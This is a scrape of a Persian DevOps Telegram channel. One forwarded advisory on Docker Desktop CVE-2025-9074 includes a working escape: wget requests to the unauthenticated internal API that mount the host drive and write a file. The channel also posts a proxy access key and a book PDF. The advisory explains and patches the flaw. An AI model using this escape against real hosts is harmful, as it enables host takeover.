Byteforge / بایــت فورج 🛸 – Telegram
Byteforge / بایــت فورج 🛸
1.71K subscribers
375 photos
119 videos
81 files
354 links
DevOps & DevSecOps
Clouds

🐧🔥 Unique content

Admin: @heman_sadeghii
Download Telegram
پاول دوروف در اقدامی گسترده، شمار زیادی از کانال‌های کلاهبرداری رمزارزی را با برچسب «کلاهبرداری / SCAM» مشخص کرد.

#news
#telegram
#byteforge
@byteforge_chan 🛸
11🔥5😘1
gen by chatgpt 5.0 v

پرامپت تصویر بالا که میتونید برای محیط های مختلف کاستومایز کنید به درخواست خودتون .


یک تصویر سه‌بعدی رندر شده دیجیتال که یک [نقش/عنوان شغلی] را نشان میدهد.
او داخل یک [نوع محفظه/شکل هندسی] با [ویژگی‌های ظاهری محفظه] نشسته است.

شخص با [ظاهر/ویژگی‌های فردی: ریش، عینک، لباس] روی یک [نوع لپ‌تاپ/رنگ لپ‌تاپ] تمرکز کرده است.

پشت او [نوع تجهیزات: رک‌های سرور/لوگوها/پنل‌ها] قرار دارند و روی دیوار آیکون‌های [فناوری‌ها یا ابزارها: Docker، Kubernetes، DevOps، Terraform و غیره] دیده میشوند.

روی میز او [وسایل روی میز: فنجان قهوه، تلفن همراه، گیاه کوچک، کابل‌ها] قرار دارد.

روی جلوی میز کلمه‌ی [متن دلخواه مثل DevOps] همراه با [نماد یا لوگوی خاص مثل ∞ یا آیکون معروف دواپس] حک شده است.

[نوع نورپردازی/رنگ‌بندی فضا: آبی تیره، نئون، نور ملایم] حال‌وهوای [حس کلی: آرام، مدرن، تکنولوژیک، آینده‌گرا] را القا میکند.

📌 این قالب کاملاً ماژولار و یونیکه؛ هر بار فقط کافیه متغیرهای داخل [ ] رو تغییر بدی تا برای هر شغل یا سناریوی دیگه خروجی سفارشی بگیری.



#ai
#chatgpt
#byteforge
@byteforge_chan 🛸
❤‍🔥6😘1
ss://Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTphOEtLNGVnaVRaZmRJNGtxR1Y3eVpy@switcher-nick-croquet.freesocks.work:443/?outline=1&prefix=%16%03%01%00%C2%A8%01%01

شدوساکس ۹۰ روزه قابل استفاده بر روی تمامی کلاینت های v2ray
📘 Task Programming in C# and .NET

یه خبر خوب! 🎉
شروع کردم به ترجمه‌ی این کتاب. که به صورت تخصصی وارد دنیای برنامه‌نویسی Task و async/await در #C و .NET میشه و منبع خیلی خوبی برای درک عمیق این مفاهیمه.
دو فصل هم ترجمه شده
لطفاً حمایت کنید.❤️

🔗 https://github.com/hheydarian/task-programming-in-csharp-dotnet-persian
❤‍🔥5🔥3🍾1
Forwarded from Linuxor ?
برای یادگیری زبان گو، اگه قبلا برنامه نویسی با زبان دیگه کردی حتما لازم نیست که بشینی ویدیو یا کتاب بخونی این کارتو راه می‌ندازه توی هر دارکتوریش/فولدرش چند تا مثال از بخش های مختلف گو رو زده، کداش رو دونه دونه بردارید روی سیستم خودتون ران کنید هرجا چیز جدید دیدید برید اونو سرچ کنید یاد بگیرید

github.com/inancgumus/learngo

@Linuxor
🔥3👏2
Linuxor ?
برای یادگیری زبان گو، اگه قبلا برنامه نویسی با زبان دیگه کردی حتما لازم نیست که بشینی ویدیو یا کتاب بخونی این کارتو راه می‌ندازه توی هر دارکتوریش/فولدرش چند تا مثال از بخش های مختلف گو رو زده، کداش رو دونه دونه بردارید روی سیستم خودتون ران کنید هرجا چیز جدید…
رفقای دواپسی گلم 🙋‍♂
میدونم که بیشترتون با پایتون راحتید
ولی بلد بودن Go واقعا حالت یه فیچر با ارزش افزوده برای یه پروداکت رو داره برای شخص شما 👌
به جمله بندی منم گیر ندین برید گو یاد بگیرید مخصوصا بچه هایی که شاید وارد شرکت های cloud native بشن در آینده
5🔥2
Forwarded from Hamed
📕 Clean Code in C#

یک خبر عالی! 🥳
ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls به‌صورت رسمی آماده شد! این کتاب یکی از منابع فوق‌العاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرم‌افزار در #C به‌حساب میاد.


همراهی و نظرات انگیزشی شما کلی انرژی و دلگرمی به این پروژه می‌ده. ممنون از حمایتتون! ❤️

https://github.com/hheydarian/clean-code-in-csharp-persian
🔥31
Forwarded from RandRng
اگر از Docker Desktop استفاده می‌کنید حتما باید آپدیتش کنید؛ یک vulnerability سطح بالا توی نحوه پیاده‌سازی داره (آپدیت آخر مشکل رو حل کرده)

https://nvd.nist.gov/vuln/detail/CVE-2025-9074

این مورد باعث میشه با ۲ خط کد بشه تمام موارد امنیتی رو دور زد و به سیستم عامل اصلی دسترسی گرفت.

توی گزارش اصلی فقط ویندوز گفته شده (نمی‌دونم مک هم داره یا نه)
👏4
Forwarded from Xero Notes
🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh


سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start


این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create


یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H


راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
👍1🔥1
Looking for a book:
Automating DevOps with GitLab CI/CD Pipelines: Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples
Byteforge / بایــت فورج 🛸
Looking for a book: Automating DevOps with GitLab CI/CD Pipelines: Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples
Automating_DevOps_with_GitLab_CICD_Pipelines_Build.pdf
27.2 MB
Automating DevOps with GitLab CI/CD Pipelines
Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples
Christopher Cowell, Nicholas Lotz & Chris Timberlake
Packt, 2023



#book
#devOps
#byteforge
@byteforge_chan 🛸
🔥3
Forwarded from ErfJab (Erfan)
با این وضعیت دلار، اگه سیستم دولوپرا خراب شه باید تغییر شغل بدن.
👍8💔3
ErfJab
با این وضعیت دلار، اگه سیستم دولوپرا خراب شه باید تغییر شغل بدن.
حقیقتا من این کانفیگ رو پارسال تابستون گرفتم 33 تومن الان باشه احتمالا یه 60تایی پیاده بشم

Core i5 12500H-16 core
32+8>>40 g ddr4 4800mhz
1T ssd nvme gen2
Gpu intel iris xe 8g share

🔥7👍2
Xero Notes
🐳 داکر سوارم (Docker Swarm): ارکستراسیون ساده و سریع برای کانتینرها داکر سوارم یک ابزار قدرتمند و سبک برای مدیریت و ارکستراسیون کانتینرهای داکر است که به شما امکان می‌دهد کانتینرهای خود را به‌صورت خودکار، مقیاس‌پذیر و امن مدیریت کنید. این ابزار با سادگی و…
مطلبت خیلی خوب و خلاصه‌ست 👌

ولییییی
یه نکته‌ای که جا افتاده اینه که Swarm دیگه عملاً توسط Docker به‌طور جدی توسعه داده نمیشه،
و بیشتر در حالت maintenance mode قرار گرفته. همین باعث شده جامعه‌ی کاربری و اکوسیستمش خیلی محدود بشه. در مقایسه با Kubernetes، مواردی مثل auto-healing، HPA (Horizontal Pod Autoscaler)، شبکه‌سازی پیشرفته (CNI)، و اکوسیستم ابزارهایی مثل Helm و Operatorها توی Swarm وجود ندارن.

مثال‌هایی که آوردی هم بیشتر دم‌دستی بودن. مثلاً برای یه نقد واقعی بهتر بود یه use-case عملی‌تر مثل دیپلوی یه اپ میکروسرویسی (frontend + backend + db) رو نشون بدی تا مقیاس‌پذیری و محدودیت‌های Swarm بهتر دیده بشه.

همچنین بخش امنیت رو خوب پوشش دادی، اما از نظر observability (مانیتورینگ، لاگ‌گیری، tracing) چیزی گفته نشده، در حالی که توی پروژه‌های واقعی خیلی مهمه. ابزارهایی مثل Prometheus، ELK یا حتی Docker Swarm Visualizer معمولاً باید بهش اضافه بشن.

خلاصه بگم: محتوا برای معرفی اولیه خیلی خوبه، ولی برای کسی که بخواد تصمیم فنی بگیره، لازمه ضعف‌ها و محدودیت‌های Swarm هم شفاف‌تر گفته بشه تا یکطرفه نباشه.



#docker
#byteforge
@byteforge_chan 🛸
🔥1